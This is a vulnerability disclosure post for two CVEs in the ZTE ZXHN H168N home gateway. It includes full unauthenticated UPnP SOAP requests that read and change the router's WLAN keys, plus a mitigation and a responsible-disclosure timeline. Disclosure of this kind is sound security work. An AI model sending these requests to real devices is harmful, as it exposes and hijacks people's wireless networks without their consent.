ZTE Home Gateway ZXHN H168N 2.2 Access Control Bypass

ZTE Home Gateway ZXHN H168N suffers from multiple access bypass and information disclosure vulnerabilities.

MD5 | 835798e5ebba5abb019adf55717b5e7d

[*] POC: (CVE-2018-7357 and CVE-2018-7358)

Disclaimer: [This POC is for Educational Purposes , I would Not be

responsible for any misuse of the information mentioned in this blog post]

[+] Unauthenticated

[+] Author: Usman Saeed (usman [at] xc0re.net)

[+] Protocol: UPnP

[+] Affected Harware/Software:

Model name: ZXHN H168N v2.2

Build Timestamp: 20171127193202

Software Version: V2.2.0_PK1.2T5

[+] Findings:

1. Unauthenticated access to WLAN password:

POST /control/igd/wlanc_1_1 HTTP/1.1

Host: <IP>:52869

User-Agent: {omitted}

Content-Length: 288

Connection: close

Content-Type: text/xml; charset="utf-8"

SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys" 1

<?xml version="1.0" encoding="utf-8"?>

<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:GetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"></u:GetSecurityKeys></s:Body></s:Envelope>

2. Unauthenticated WLAN passphrase change:

POST /control/igd/wlanc_1_1 HTTP/1.1

Host: <IP>:52869

User-Agent: {omitted}

Content-Length: 496

Connection: close

Content-Type: text/xml; charset="utf-8"

SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys"

<?xml version="1.0" encoding="utf-8"?>

<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:SetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"><NewWEPKey0>{omitted}</NewWEPKey0><NewWEPKey1>{omitted}</NewWEPKey1><NewWEPKey2>{omitted}</NewWEPKey2><NewWEPKey3>{omitted}</NewWEPKey3><NewPreSharedKey>{omitted}</NewPreSharedKey><NewKeyPassphrase>{omitted}</NewKeyPassphrase></u:SetSecurityKeys></s:Body></s:Envelope>

[*] Solution:

UPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices.

[*] Note:

There are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same.

[+] Responsible Disclosure:

Vulnerabilities identified - 20 August, 2018

Reported to ZTE - 28 August, 2018

ZTE official statement - 17 September 2018

ZTE patched the vulnerability - 12 November 2018

The operator pushed the update - 12 November 2018

CVE published - CVE- 2018-7357 and CVE-2018-7358

Public disclosure - 12 November 2018

Ref: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522

Related Posts